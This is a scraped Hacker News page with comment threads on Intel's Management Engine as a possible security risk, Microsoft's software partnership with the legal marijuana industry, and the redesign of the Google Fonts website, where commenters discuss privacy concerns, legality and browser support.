ME is a bit scary partly because it's a totally closed-source and proprietary component of your computer with full and essentially unfettered access to everything - RAM, peripherals, and network I/O. Any bug in a publicly-accessible component would have the potential to do serious damage. For example, a bug in the network stack might make it possible for attackers to remotely own your box.

2
kriro 1 day ago 3 replies      
Joanna Rutkowska has written a nice paper on the topic, highly recommended: http://blog.invisiblethings.org/papers/2015/x86_harmful.pdf

Edit:There's also a talk from 32c3 for those more inclined to watch a video. I am pretty worried ever since I watched that: https://www.youtube.com/watch?v=rcwngbUrZNg

(which is why I have researched non-Intel laptop alternatives..cliffnotes: GPUs without BLOBs are hard to find and there will be some severe tradeoffs which is expected)

3
Philipp__ 1 day ago 3 replies      
And this is why monopoly of one giant monolith is bad, in any area or case! They get to the whatever the f they want! It's not like everything is made today to track, and give access to "authorities" when they want it. But what really drives me mad is that I feel tricked! You put trust into someone and it's work, and give them money for that, but they do this, without you even knowing.

I was always making fun of sworn GNU guys, always thought they were overblowing things out of the context. But maybe they were on the track! Anyhow, I want more competitive CPU space, we need AMD to get back into game, IBMs Power9, ARM, anything. But as things are standing right now, we won't see that anytime soon.

4
markokrajnc 1 day ago 4 replies      
It may be, that Intel didn't plan this as an NSA/XYZ back door - but it doesn't actually matter. What matters is that we know 1) Intel has such technology implemented in allmost all desktops/servers currently running 2) you can access those machines remotely (even over GSM) and perform reads/writes.

Example misuse: somebody can put illegal stuff on your machine and then sue you...

(Intel has marketed this feature for big companies so they can format the HDD remotely over GSM in case laptop was stolen.)

5
captainmuon 1 day ago 2 replies      
Very naively, I wonder what happens if you just call Intel and complain about this. Say you want a way to remove the ME completely. They won't help you, but I wonder how they will justify making it compulsory if pressed.

Now if I call them, I wouldn't reach anybody important. But surely there are a couple of people on HN who are lawyers, CEOs, with the government etc.? If you have an imposing job and a few minutes to spare, I'd like to see what Intel has to say about this.

6
fineforyouo 1 day ago 1 reply      
I wish the European Commission study this problem and if found guilty impose a fine in such a way and quantity that in no way those firms can continue exposing their clients to possible economic damage.

The previous imposed fine was of EUR 1.06 billion.

Someone with the required knowledge should submit a detailed record of this potential hazard to the European Commission emphasizing how this system could expose clients to possible threats, its anticompetitive nature, since it could allow hackers gain access to economic secrets, and many other important points.

The FSF should stand up and speak clearly. I hope and wish that the FSF execute its mission, that is to gain and gather the necessary strength to expose the nature and extend of these problems and how to fight against them.

Those that impose on us tools that allow them to control our business, steal our ideas and plans, and ruin our enterprises plaguing with chaos. Those that thrive to submit our future to their will should be fined.

I certainly hope that a new economic fine be imposed. That initiative and measure would set up a strong message and a new precedent targeted to those threating our liberty and economy. A message encoded into an economic hammer with the power to make them shape their will to respect our freedom and integrity.

To be Free and Survive we should Fight. FSF.

7
confounded 1 day ago 3 replies      
I'm very surprised that no-one on HN has talked about their experiences of using AMT for enterprise IT management. Aside from the security problems, I've personally never encountered or seen it's use, which makes the ME's inclusion (on all chips, for about 6 years) seem like an odd decision from Intel.
8
digler999 2 days ago 2 replies      
No doubt various three-letter agencies are having a field-day with this right now.

Hopefully a robin-hood type will reverse-engineer the blob and post a permanent fix to disable this thing before a more nefarious person/group uses it to devastate the PC landscape with something even worse than bitlocker.

9
shmerl 2 days ago 2 replies      
Why can't Intel implement proper security and open up this blob to begin with? Not opening it and not allowing to disable it, suggests it's intended for something sinister.
10
EdSharkey 1 day ago 0 replies      
The fact that the ME microcontroller can run arbitrary Java code, uploaded at runtime rather than read from ROM is pernicious. The intel private key can sign any blob, and ME would run it.

It makes me wonder, could an Java program uploaded to ME crash it or put it into an infinite loop? What would the effect be on the host OS if ME suddenly became unresponsive?

Perhaps a "Kill ME" binary could be developed as open source, and perhaps we could get Intel to sign it? If there was a strong enough request to Intel by consumers, why wouldn't they go ahead and sign it for us? No skin of their noses what we do with our consumer-grade boxes, right?

11
ksk 1 day ago 0 replies      
I think at this point pretty much anything on your PC is backdoorable. I can't think of a single device in my computer that doesn't respond to "magic I/O packets" which are undocumented (obviously) and prone to bugs (possibly).

Gaming mouse? Yeah send some I/O packets and you can change the DPI, USB update rate, whatever. A write-protected USB device? Uh-huh, send some magic-packets to the controllers to reset it/format it/whatever (Recently did this with one of those Dell USB Mentor Media drives that they ship the OS on). Access point? Yeah, send some magic packets and you can set the password/SSID/whatever. Hard Disk? undocumented SATA commands allows for reprogramming. This is just the 'easy' way, without going into JTAG and other diagnostic interfaces.

12
slasaus 1 day ago 0 replies      
FWIW, there is a petition for Intel to release an ME-less CPU design: https://puri.sm/posts/petition-for-intel-to-release-an-me-le...

(as mentioned in a comparable thread five days ago: "Intel and ME, and why we should get rid of ME" (fsf.org) https://news.ycombinator.com/item?id=11880935)

13
oneplane 1 day ago 1 reply      
While that article is correct, it's full of FUD with the constant littering of 'secret' and 'take over' in the text.

We already know about Igor's research and the published ARC CPU reverse engineering, "Ring -3" rootkits and the DEF CON presentations. This is bad, and this needs even more reverse engineering so at some point we might add an 'open' replacement for the required ME functions and run it together with say, LibreBoot/CoreBoot.

I wonder why there haven't been any NDA ME or ARC docs leaked yet, even some of the Broadcom SOCs had those leaked and via cleanroom design proper FOSS drivers for some of the wireless parts were created... this should be possible with the Intel ME as well. Hell, even a FOSS version or at least partially reverse engineered and modified version of laptop EC firmwares have popped up on the 'net.

14
brudgers 1 day ago 0 replies      
The thing about scale is that it doesn't look like ordinary individual experience. It ain't enough to run Core2/\Piledriver/\Power/\open source microcode: ME enabled computers are connected en masse to the network. The choices are air gap or head in the sand. ME was inside before Snowden.

Google, Facebook, Amazon, Ebay, Microsoft,, etc. buy Xeons by the bucketful. They're Intel's customers that matter. The retail box that comes with a fan for sale at NewEgg is just exhaust fumes. 42 or "It's the cloud": take your pick. Managing a gazillion server data center by hand just ain't practical.

Intel's customers that matter replace CPU assets on the IRS's three year depreciation schedule. It's why this [0] and why ME. Security by obscurity isn't so bad when dumping the vulnerable subsystem lowers overall costs for other reasons [performance boosts and lower power consumption].

ME is a good reason that Microsoft has been striving toward multiplatform. It no longer has such a big say in Intel's roadmap. Yes UEFI and the Windows 10 upgrade process kinda suck, but Microsoft ain't pwn'ing anyone's computer because Intel already pwn'd it. ME going sideways at scale would hurt and Microsoft would be the handy victim.

There's a strategic reason Apple is making it's own chips.

[0]: http://www.techspot.com/review/1155-affordable-dual-xeon-pc/

15
morganvachon 2 days ago 5 replies      
Nice breakdown of how ME works, but nothing new here.

Still, I'm glad I hold on to a ton of older, pre Core i-series Intel machines, AMD machines, and ARM boards. If ME is ever truly compromised at least I have a fallback or three.

16
hoodoof 1 day ago 1 reply      
If you get a microscope and manage to peer into this secret hidey hole in the CPU you will see a bunch of tiny little NSA spooks, Russian and Chinese hackers scuttle away to hide in other dark hidden secret corners of the Intel CPU.
17
rdtsc 1 day ago 5 replies      
I think this is time for AMD or IBM's POWER8/9 to step in. If anything a little good PR vis-a-vis the "rootkit nightmare waiting to happen in your server" would be nice.
18
endgame 1 day ago 5 replies      
Where can people go if they want a fully-libre machine and are willing to sacrifice x86?
19
DiabloD3 1 day ago 4 replies      
I find people freaking out about this extremely strange.

AMT is Intel's equivalent of IPMI. It is a non-standard implementation of it, and does not follow any of the relevant specifications. It does not integrate into most server management platforms.

AMT costs extra. Most mobos do not have it enabled as you have to pay Intel's tax on it, even if some of the hardware to enable it is in every northbridge.

A motherboard must implement it to be available. Most of the motherboards we own don't have it enabled. You cannot "break into it" if AMT isn't available on your motherboard to begin with.

Not all ME chips can run it due to Intel's requirements.

Now, is the ME chip a threat? Possibly, not not as much as your cell phone's baseband modem is. The baseband modem can talk to outside networks, ME can't unless it is paired with a NIC it can talk to (Intel does not require mobos that have this; and generally, motherboards meant for AMT ship Intel NICs, but not always).

Without AMT, the only thing the ME does is implement management functions that allow you to actually boot and use the machine.

In the article, it says "Personally, I would like if my ME only did the most basic task it was designed for, set up the bus clocks, and then shut off," except it is kept running so you can properly sleep and wake up your machine, and also be able to change CPU frequencies at run time (IE, idle the cpu), and also provide access to the sensors on the motherboard.

In addition, the ME handles Intel Smart Connect, which is also not available on all boards (Apple uses this to implement Power Nap). It also requires licensing, the same way AMT does, and may mobo manufs simply don't want to license it.

ME does not connect to the network if it doesn't have a payload that is able to do so (AMT, Smart Connect).

The reason people don't understand what ME is for is because all of the basic tasks the ME does used to be done by lots of custom hardware, much of it not provided by Intel and different on every board, and somewhat a bit of a driver nightmare.

I don't like standing up for Intel, but anti-ME articles that continually bring up AMT as if all computers have it is FUD. Very few computers have AMT, very few computers implement this OOB access, very few computers can implement AMT even if Intel let you purchase licensing for it after purchasing the hardware.

I'm not saying that ME is not a security hazard (it can be in some cases), but it isn't some ultra awesome NSA backdoor bullshit. Your phone, however, does have the NSA backdoor.

20
narrator 1 day ago 3 replies      
Almost makes you want to get a Lemote Laptop like Richard Stallman.
21
textmode 2 days ago 3 replies      
Taking another angle: What if the computer's owner wants to use it to access her computer remotely? Are there some instructions how to do this? Is it feasible?

If not, then there seems little justification to have a relatively new feature like this turned on by default. Who is this feature really for? If it's not for all users then why is activation mandatory in CPUs after Core2?

I mean, if ME has to be active, then the computer's owner should be able to use it, right?

23
optimiz3 2 days ago 3 replies      
Serious question: are AMD chips a viable alternative (from a security standpoint)? I hear their new Zen chips are coming soon.
24
bArray 1 day ago 2 replies      
My question is whether alternatives are secure, such as AMD or ARM? I imagine the ARM architecture to be too scrutinised and low power to get away with that sort of thing?

Personally I want to buy a laptop that is secure due to travelling to questionable places, I am wondering now whether it will include an Intel CPU in light of this.

25
Illniyar 2 days ago 1 reply      
Thats crazy talk, in what world is it ok for my cpu to run a tcp stack on its own?
26
throw2016 1 day ago 5 replies      
This adds a whole new dimension to 'Intel Inside'. It says exactly what anyone needs to know.

If it's for enterprise features as 'innocently' suggested that those who do not need or want this feature should be able to put it off simply without drama, debate or discussion.

Its not surprising that both AMD and ARM have it. This is an orchestrated effort signifying the win of paranoia and security over privacy in the western world.

This war is being fought on too many fronts by well resourced and paranoid security agencies with all the tools to influence and the only defense would be individuals and our sense of right and wrong. But it seems individuals have been completely disempowered and reduced to survival mode and are not in a position to stand up for the right thing or even talk about it.

If 'moral' individuals can so easily be quietened in well off economies then one wonders what happens in other economies where basic survival is a day to day fight. Who will fight the privacy war? The silence is deafening. It seems all the activism and racket from media, academics, NGOs and human rights organizations only come into play when a western political or strategic objective needs to be met.

There are many who believe that by working with and supporting security agencies they are somehow in the forefront of a nebulous fight of survival and freedom in a dark world. This 'dark world' is a self created and self serving fantasy and comedy for grown, well adjusted and well read individuals to fall for that push humanity into a negative space.

It can be taken for granted unless conclusively proved otherwise with the burden of evidence swaying the other way that any technology coming out of the USA and Europe is compromised completely and the fight for privacy here has been lost.

27
Animats 1 day ago 1 reply      
The real question is what the firmware can be convinced to do remotely. Probably most of the things in here.[1] Remote management is supposed to be listening on TCP ports TCP 623 for HTTP and 664 for HTTPS.

[1] http://www.dmtf.org/sites/default/files/standards/documents/...

28
wfunction 1 day ago 1 reply      
Can someone tell me if people have actually spotted the Intel ME doing unauthorized communication?

I imagine it should be easy to spot in any network firewall log (note I said network, not OS), and in reality, if it's never been observed to communicate with the outside world without explicitly being told to then do people really need to worry?

29
cocomutator 1 day ago 2 replies      
I still don't understand why this ME feature has been created to begin with. Assuming that breaking it is a matter of time (someone clever enough thinking about it for long enough), it seems like a serious security vulnerability, worse still because an attack is undetectable.

Why create it in the first place? Are the enterprise uses the article mentions worth the risk?

30
happycube 1 day ago 1 reply      
Amusingly, the ARC core in the Intel ME is a descendant of the SNES SuperFX chip.
31
hoodoof 1 day ago 2 replies      
Strange that Intel gives people more reason to go to other processors like ARM when Intel is under such pressure from competition.
32
nthcolumn 1 day ago 0 replies      
33
ssebastianj 1 day ago 1 reply      
I wasn't aware about Intel ME until recently bought a brand new Lenovo ThinkPad and saw the "Intel Management Engine" on BIOS/UEFI boot menu.

The thing is: how can I configure this ME thing in order to avoid (or minimize, at least) possible attacks?

34
xlayn 1 day ago 0 replies      
I would use thunderbolt as it has DMA, create a CRC/F(x) cpu (external unit connected thru thunderbolt) that converts/encrypt code/data to a expected format by modified code generated by a compiler.making act the intel cpu as surrogate to it, delegating control to the CRC/F(x) cpu.

Extra points, make all the cpus work, and create extra tasks to run at the non used cpus to obscure the actual process running (yeah I know it's not energy efficient but someones has to give Intel inspiration to improve).

35
dingdingdang 1 day ago 1 reply      
One thing, OK, so we have this super fantastic network enabled Java platform running autonomously from within around 3 billion devices across the globe since 2006 with the capability to read everything from the systems they are running completely unnoticed.. shouldn't this generate a FAIR amount of network traffic (and resulting suspicious log files, if not on the computers then on the routers) or am I missing something here?!
36
sspiff 1 day ago 0 replies      
I knew about ME, but I didn't know it had an ARC processor in it. Odd that Intel didn't opt for an in-house design, like one of their older cores backported to a newer process. (like a P54 or 386).
37
elchief 1 day ago 0 replies      
Has anyone on here actually used this at work?
38
hugdru 1 day ago 1 reply      
Oh my god it began with the oems installing a bunch of spyware on the default install. Many of which with vulnerabilities. Not to mention "modern" OSes not respecting users privacy. To make matters worse the hardware companies decided to follow suit and thus added unwanted and compromising features to everyday systems. Way to go! It seems I'll have to switch to stone age hardware just to have a little peace of mind. Evolution! >(
39
LeoPanthera 2 days ago 6 replies      
Does this apply to Macs?
40
milkey_mouse 1 day ago 0 replies      
Finally, the ME is getting the exposure it deserves. Seems like just two weeks ago nobody knew it existed.
41
jorblumesea 1 day ago 0 replies      
It's probably safe to say that every device you own or ever owned has a back door, intentional or not. The false sense of security people had about their machines was a myth, glad to see it finally die.
42
arca_vorago 1 day ago 1 reply      
When it comes to hardware backdoors, one particular case seems to keep popping up in my mind, and that is Bill Hamilton of the infamous Inslaw/Promis octopus debacle. A few years ago when I was on Scheiers blog regular, he was claiming they had prearranged the backdoor installation at the silicon manufacturing level...

Something about that has never left my mind, and I suspect its generally correct. Heres hoping that power8 workstation Talos gets off the ground...or some risc equiv.

43
SeanDav 1 day ago 0 replies      
Once a malicious 3rd party gets the keys to this kingdom it is game over.
44
ohitsdom 1 day ago 2 replies      
Maybe I missed it in the article, but why is this only present on x86 chips? How do 64-bit processors from Intel offer the same management functionality without this ME subsystem?
45
vasili111 2 days ago 1 reply      
What about AMD?
46
oolongCat 1 day ago 0 replies      
Best way to deal with issues like this, make them care. How? we need to get this message to the masses, to get enough people know about this potential issue, that it becomes an organisational issue for Intel.
47
pmarreck 1 day ago 0 replies      
Yo dawg...
6
Microsoft is the first big company to say it's serving the legal marijuana trade nytimes.com
496 points by ghshephard  1 day ago   210 comments top 26
1
edoceo 1 day ago 2 replies      
I make https://weedtraqr.com/ - we are operational in Washington and Oregon - and now apparently compete with MS.

The company Microsoft is working with (Agrisoft) doesn't even operate in WA, or OR yet. And has been sold like two times in the last two years (first to Surna[0] then to Kind[1])

Additionally their "partnership" is really just Agrisoft getting free Azure hosting. The headline is very click-bait.

[0] http://www.prnewswire.com/news-releases/surna-inc-acquires-m...

[1] http://www.prnewswire.com/news-releases/kind-financial-acqui...

2
delbel 1 day ago 4 replies      
The system Oregon (and Colorado) uses for recreational is called METRC and is made by a company called Franwell. When I was at training, the spokes person actually asked for hands raised if anyone knew what a REST API was. Their seed-to-sale tracking system (required by law in Oregon), if used for food (just for example) would be able to tell you what corn field, and what corn plant, in Iowa, when and what fertilizer used, in a hamburger you just ate. (to draw an analogy) -- might be a little overkill but it what the current recreational law. The METRC webui I think is bootstrap based and is very nice. I haven't looked at the REST API yet, but their system integrates with RFID tags on the plant and packages itself with chain of custody style controls. http://www.metrc.com/ I am user of their system.
3
dragonwriter 1 day ago 6 replies      
There is no legal marijuana trade in the US, as all marijuana trade is criminal under federal law, and it's generally a crime to knowingly profit from a crime (and, since drug offenses are covered in RICO, it's another crime to use any profits tired to them in the operation of any business engaged in interstate commerce.)

Microsoft may be keeping distant enough not to worry (though perhaps not given their formal partnership with Kind, even if their own offering is only to governments), but Kind is basically betting it's business -- and the personal liberty of its decision makers -- on the willingness of the federal government to extend the informal prosecutorial tolerance of in-state activities related to marijuana that comply with state laws in states which have adopted some form of state legalization to larger interstate enterprises (and on that tolerance continuing at all, which it might well not under a different administration.)

4
kbenson 1 day ago 2 replies      
This makes sense. As a big player in enterprise, Microsoft is recognizing that there's a new industry that's vastly under served.
5
godzillabrennus 1 day ago 3 replies      
Good. Maybe they can open a cafe on their campus to sell recreational versions so their people can test their tech and try the product.

It'd make many developers I know want to work for Microsoft.

6
pboutros 1 day ago 1 reply      
Explains what was going on when they bought LinkedIn.

/s

7
mwsherman 1 day ago 0 replies      
This is a good example of an enormous chilling effect that legal risk offers. Not just prohibition of drugs, but any large regulatory regimes where its hard to say what legal is.

Big categories of software go underdeveloped, leaving an industry in the dark ages. Its one reason why medical software is so bad being on the wrong side of legal risk is too dangerous.

8
pritam2020 1 day ago 2 replies      
So we will have a new metric like the ballmer peak?
9
Drakim 1 day ago 3 replies      
What is the legality of marijuana on the federal level in the US? I was under the impression that even if marijuana is legal on a state level you can still get in trouble for it.
10
MikeHolman 1 day ago 0 replies      
Regardless of actual amount of effort Microsoft is putting here, just putting their feet in the water and showing interest is a very smart move. Marijuana is poised to become a multibillion dollar industry, and Microsoft (being based in WA) is in a unique position among the tech giants to capitalize.
11
drawkbox 1 day ago 0 replies      
Imagine not getting in early on tobacco or alcohol markets. That created tons of wealth.

Companies are smart to hop on the end of another prohibition that will be quite lucrative. It is an immense blue ocean.

12
romanovcode 1 day ago 0 replies      
I think they do it because they can. Smaller companies are too afraid, MS is too big and they are not going away if someone won't like it.

Good to hear, nevertheless.

13
bashmohandes 1 day ago 0 replies      
Gives a whole new meaning to Cloud Computing.
14
musgrove 22 hours ago 0 replies      
This seems to be a pretty certain thing that they know what the decision will be about re-classifying pot. Not to mention the legalization of it nationally. I would hope.
15
vegabook 1 day ago 4 replies      
Wow Microsoft is tickin' all the cool boxes under Nadella. Never seen such a radical, and it seems, effective, corpo image turnaround. Open source? Check. Ubuntu on Windows? Check. Contribute to BSD? Check. Progressive on pot? Check. Defeat the bots? Check. Gates on chickens? Check. This company is sick/dope/ice cold cool.
16
donw 1 day ago 0 replies      
Pretty sure that distinction goes to Taco Bell...
17
Animats 1 day ago 0 replies      
This is more like "Kind becomes Microsoft Certified Solution Provider". Not really big news.
18
Razengan 22 hours ago 0 replies      
I'm still hoping for Apple to release macOS Weed someday.
19
antsam 22 hours ago 0 replies      
Did somebody make a joke about "the cloud" yet?
20
anonbanker 1 day ago 0 replies      
You couldn't pay us[0] to use a microsoft product. We'll stick with OpenBravo[1] and OpenAG Initiative[2] to handle all our enterprise resource needs from seed to customer.

0. http://medicalcannab.is

1. http://www.openbravo.com/

2. https://github.com/OpenAgInitiative

21
hans 1 day ago 0 replies      
well then the chatbots are going to get much better ;]
22
joaoaccarvalho 1 day ago 0 replies      
Job interviews be like: "How often do you smoke marijuana?"
23
planetmcd 1 day ago 0 replies      
Maybe that is why the forced the latest update?
24
dreamdu5t 1 day ago 0 replies      
What a cumbersome, wasteful, unnecessary regulatory system.

It says a lot about the US that the food they eat does not have this level of monitoring and regulation (to track outbreaks like E. Coli) but marijuana does, despite not killing anyone.

25
pi-squared 1 day ago 1 reply      
Accidental or purposeful "weed" in the photo behind the knee of the guy on the main pic?
26
Roboprog 1 day ago 0 replies      
So, they'll be plugging in the TVs^H^H^H Monitors for some of the more out of it customers???

(with apologies to Cheech & Chong)

Green Screen of Somnolence???

7
Google Fonts Redesigned fonts.google.com
547 points by uptown  3 days ago   258 comments top 61
1
di 3 days ago 6 replies      
If anyone is curious about the sample text:

* "All their equipment and instruments are alive." (Mr. Spaceship, by Philip K. Dick)

* "A red flair silhouetted the jagged edge of a wing." (The Jewels of Aptor, by Samuel R. Delany)

* "I watched the storm, so beautiful yet terrific." (Frankenstein, by Mary Shelley)

* "Almost before we knew it, we had left the ground." (A Trip to Venus, by John Munro)

* "A shining crescent far beneath the flying vessel." (Triplanetary, by E. E. Smith)

* "It was going to be a lonely trip back." (Youth by Isaac Asimov)

* "Mist enveloped the ship three hours out from port." (The Jewels of Aptor, by Samuel R. Delany)

* "My two natures had memory in common." (Strange Case of Dr Jekyll and Mr Hyde, by Robert Louis Stevenson)

* "Silver mist suffused the deck of the ship." (The Jewels of Aptor, by Samuel R. Delany)

* "The face of the moon was in shadow." (Mr. Spaceship, by Philip K. Dick)

* "She stared through the window at the stars." (The Millionaire's Convenient Bride, by Catherine George) ????

* "The recorded voice scratched in the speaker." (Deathworld, by Harry Harrison)

* "The sky was cloudless and of a deep dark blue." (A Trip to Venus, by John Munro)

* "The spectacle before us was indeed sublime." (A Trip to Venus, by John Munro)

* "Then came the night of the first falling star." (The War of the Worlds, H. G. Wells)

* "Waves flung themselves at the blue evening." (The Jewels of Aptor, by Samuel R. Delany)

2
ocdtrekkie 3 days ago 9 replies      
"Your browser is not currently supported. Google Fonts works best on Chrome, Firefox, or Safari."

Google still treating Edge users like trash, I see[0]. Microsoft Edge works fine for the vast majority of websites, and a block like this telling you to get a different browser is incredibly painful. If you tell me I need a different browser, I'm going to find a different company or website to do business with.

[0]Gmail pesters Edge users weekly to switch to Chrome. Unlike other browsers, where pressing 'not interested' causes it to go away permanently, it returns weekly like a bad rash.

3
mortenjorck 3 days ago 1 reply      
This is a gorgeous redesign that really lets the typography shine, as well as deftly addressing numerous usability issues with the old site. The family size filter in particular makes finding a usable set of weights much easier, and the featured section adds a welcome new layer of curation.

Two minor observations:

- It would be a great addition to the family size slider to be able to filter for "contains italics." Some font families have a broad set of stroke weights, but aren't usable for certain content because they lack italics.

- A nitpick, but "Handwriting" has always seemed a somewhat suboptimal filter label. Many of the fonts contained therein might be better described as "script" or "calligraphic", while "handwriting" connotes something more strictly vernacular.

All said, this is an excellent update that brings the Google Fonts experience into the realm of subscription services like Typekit.

4
SEMW 3 days ago 10 replies      
Looks great in Chrome, completely broken in Firefox: https://i.imgur.com/XRMgcHp.png.
5
Sir_Cmpwn 3 days ago 2 replies      
God dammit https://sr.ht/xkFx.png

Never, ever, ever disable functionailty based on someone's user agent. Just let it be broken, because spoiler alert: it's probably usable anyway.

6
zy1t 3 days ago 3 replies      
This redesign is awesome, but I think it might have killed my side project.

Ive been working on a site that offers google fonts with better visuals and search by font feature (x-height, stroke contrast, etc) functionality.

Sunk 30+ hours into it designing + coding up the front end while my friend works on programmatically tagging the font on the backend.

I want to continue working on my project, but it now feels a lot less relevant. Any advice, HN?

For the curious, here's a wireframe of the main screen:https://www.dropbox.com/s/vzobxm2a2ul9y5l/main%20search.png?...

7
chrismorgan 3 days ago 2 replies      
This is nice and all (apart from an astonishingeven for Googledegree of browser compatibility regression), but what I really want is for the actual fonts to be updated. Crimson Text, for example, is an outdated version of the font, which it breaks a little further too. Upstream (https://github.com/skosch/Crimson) has seen substantial improvements, but Google has never updated it, ignoring the authors pleas.
8
thedaemon 3 days ago 1 reply      
I kept looking at the fonts to see what changes they made. Then I realized that the website was redesigned, not the fonts. Perhaps the title should be changed to reflect this?
9
cickpass_broken 3 days ago 2 replies      
Todd Motto did a bit of an analysis of the client-side, angular performance: https://mobile.twitter.com/toddmotto/status/7427897282573557...

"Google Fonts is doing some amazing work on performance, no ng-repeats - superfast DOM rendering. "

10
makecheck 10 hours ago 0 replies      
Im not sure why but interfaces that consist only of red and black text look very unpleasant to me. I felt the same way when Apple started using red and black for things like iOS calendar highlights.

I suspect the reason is that they are both strong colors that compete for attention: black-on-white is high contrast and red is a color that generally jumps out from the page due to the eyes perception of red. To keep the colors from competing, one of the text colors should be softer (and if they must have red, they should soften it to something that is closer to pastel or pink).

11
rakstrooper 3 days ago 2 replies      
Why does Google deliberately ensure that their websites don't work with Microsoft browsers?
12
hanniabu 3 days ago 1 reply      
I'm not sure how I feel about all these different phrases. I think it's easier to pick out which font I like when all the phrases are the same. The phrase "the quick brown fox jumps over the lazy dog" had been a great one because it contains every character in the alphabet so you can see how every letter will look at once.
13
frenchie4111 3 days ago 1 reply      
I still have the same problem I had with the old UI: The only reason I come to this site to get the copy/paste one liner to put a certain font on my site, but every time it takes me a few minutes to find it
14
michaelmrose 3 days ago 1 reply      
It looks like mad libs to me with all these little boxes in place of some of the letters. This appear to be little input boxes. You can grab and resize the box but it snaps back, you can also type in the box but it is quickly erased.

Super ridiculous.

15
stuaxo 2 days ago 2 replies      
Why are loads of the letters replaced by empty boxes ? Is this a gameshow reference?

http://imgur.com/CY0yv4R

16
semi-extrinsic 3 days ago 0 replies      
Minor criticism: the characters preview is a bit of a mess. Two issues:

1) You're missing important non-ASCII characters which I know are in some of these fonts (such as Open Sans). These include German and Scandinavian characters like (maybe more).

2) The ordering is non-standard and makes it hard to see what is actually there and not.

17
xaduha 3 days ago 1 reply      
Can someone explain to me why Google Fonts doesn't provide proper cache headers, still?

https://stackoverflow.com/questions/29091014/how-do-i-levera...

Why disallow caching? Unless I'm misunderstanding something.

18
teuth 3 days ago 0 replies      
Really dislike the ng-click navigation for opening individual font pages. Those clickable elements should be anchors, to allow opening the pages in new tabs.

There doesn't seem to be any usability case for breaking a basic browsing convention here.

19
ibero 3 days ago 1 reply      
this is an update i didn't know i wanted. so many great little UX improvements to my workflow.

an interesting aside, they now have the ability to toggle the background (and font color). the presets are (black on white, white on black) interestingly, one of the presets is black on yellow. i didn't realize this was such a a popular of a text/bg combination.

20
thomaspark 3 days ago 0 replies      
Lovely redesign that addresses usability complaints I had with the old version. In fact I built my own search tool for Google Fonts a few months back because of these issues:

http://fontcdn.org

Some of my critiques of the old version:

http://thomaspark.co/2015/08/a-better-way-to-search-google-f...

21
whizzkid 3 days ago 0 replies      
I just wondered why it is laggy when I scroll the page down quickly and inspected the network activity.

6 times scrolling ends up with 210 new requests. really? Is this really needed or can't it be improved easily with bigger range of pagination size?

22
jeena 2 days ago 1 reply      
I have to wonder, is this some kind of a joke? https://jeena.net/s/google-fonts.png
23
franciscop 3 days ago 0 replies      
Isn't it counterintuitive that there are two scroll next to each other for smaller screens? And also that the one on the right is to scroll the content on the left, while the one on the left is to scroll the content on the right.

http://imgur.com/x9BMjmR

24
lossolo 3 days ago 0 replies      
Firefox on Ubuntu:

http://imgur.com/IpauSTs

25
gotchange 3 days ago 0 replies      
I congratulate the Google Fonts team The redesign job looks gorgeous and elegant in terms of UI and UX too but can I make a few suggestions if possible?

1- Can you please add a double view button at the top to toggle between List and Grid views for maximum convenience?

2- At the risk of sounding a bit pedantic but some example sentences for the Arabic fonts don't look perfect.

For example, for the Amiri font, it's or more naturally and not [1]. For Lateef and without going over a lot of MSA grammatical rules, this is the more correct version of the example sentence . [2]

[1] The shades hid the moon.

[2] A recorded voice went off through a megaphone/speaker mounted above the door.

26
microcolonel 3 days ago 0 replies      
This is very frustrating; can't middle click to open a specimen in another window. I really hate this sort of website. They also seem to disable subpixel antialiasing on some of the transient buttons. I also don't like transient buttons to begin with.

Overall really not happy with most of this redesign. The specimen page is probably more informative though.

I get that OS X has bad subpixel rendering which shows painful fringing on coloured text, but FreeType handles it flawlessly, and I'm pretty sure ClearType does as well. There's no reason to disable subpixel rendering on these platforms.

27
buro9 2 days ago 0 replies      
I would love if they released the server logic that chose which file to include.

With http/2 I'd like to host the files so that they are served from the same origin, I'd also like to cache the CSS longer than a day.

At the moment I hit two domains (and I preconnect) to try and speed this up:

 <link rel="preconnect" href="https://fonts.googleapis"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
Then in my CSS I import:

 @import url(https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,600|Merriweather:400,400italic,700italic,700);
That URL loads:

1. More fonts than I need.

2. Different font files depending on... useragent?

I'd prefer to self-host so that I could user http/2 server push for new sessions, and so that I could extend the caching.

The same origin via http/2 would accelerate all of the connections, and removing the need for the additional TLS connection to 2 Google properties will speed it up too.

These are about my only criticisms of Google fonts, that the little bit to make it really useful for those who want webfonts and performance is the bit that's hidden.

28
barefootcoder 2 days ago 0 replies      
The page has an interesting bug with some special characters... it will initially accept it, showing it in a different font, and then it will change to an empty box. I tried a few, such as (trademark) or (infinity) and they don't show up on the initial overview page, but if you click on the see specimen link you can type the same characters and see that the font does have them defined.
29
ericmo 3 days ago 2 replies      
Very good, but needs a option for resizing. I've tried looking at monospaced fonts and couldn't see them at a size that a monospaced font would actually be used (default is huge).
30
textmode 2 days ago 0 replies      
fonts.google*.com is similar to the Facebook "Like" button.

Google effort to inject themselves into websites that may have nothing to do with Google, read by users who may not even use Google.

Users may be far from Google search engine page or any Google controlled subsidiary Blogger, etc., yet their Google-authored? browser is still connecting to Google.

These Google font domains are among the many useless and annoying domains I block.

I remember the days when another large company was pushing "Web fonts". They asked the user to "install" the fonts; there was no "font server" and incessant phoning home.

Today that company forces 10GB+ downloads of their "updated" OS on users without unequivocal consent. The stories of systems crashing in Africa under the load and network admins puzzling over the effects of massive Windows Update traffic in Australia have been amusing.

Keep up the great work guys. Those "web fonts" are really amazing!

31
forrestthewoods 3 days ago 0 replies      
These all look really bad on my Win 10 + Chrome machine. It's like the clear type settings aren't working right? Every font has a very fuzzy/blurry edge. Really weird. It's almost like it's rendering small and blowing up. Rather than rendering large and anti-aliasing.

Maybe something is wrong with my PC?

32
stolsvik 3 days ago 1 reply      
Are these free to use? Open and permissive license? Should be the first thing that was mentioned on the site.
33
chmike 2 days ago 1 reply      
What is wrong with this page ? It looks awful with firefox 47.0 on Ubuntu ! [screen capture](http://imgur.com/hqc6jp2)
34
macandcheese 3 days ago 0 replies      
Beautiful redesign! Very cool functionality with the inline editor and contextually revealed selectors.

...but they prevent you from right-clicking to open fonts in a new tab. I can already click into a font by regularly clicking, did they need to override right-click functionality as well?

35
Ciantic 2 days ago 0 replies      
There is still two pages for single font, one such as this:

https://www.google.com/fonts/specimen/Open+Sans

And now this:

https://fonts.google.com/specimen/Open+Sans?query=open+sans

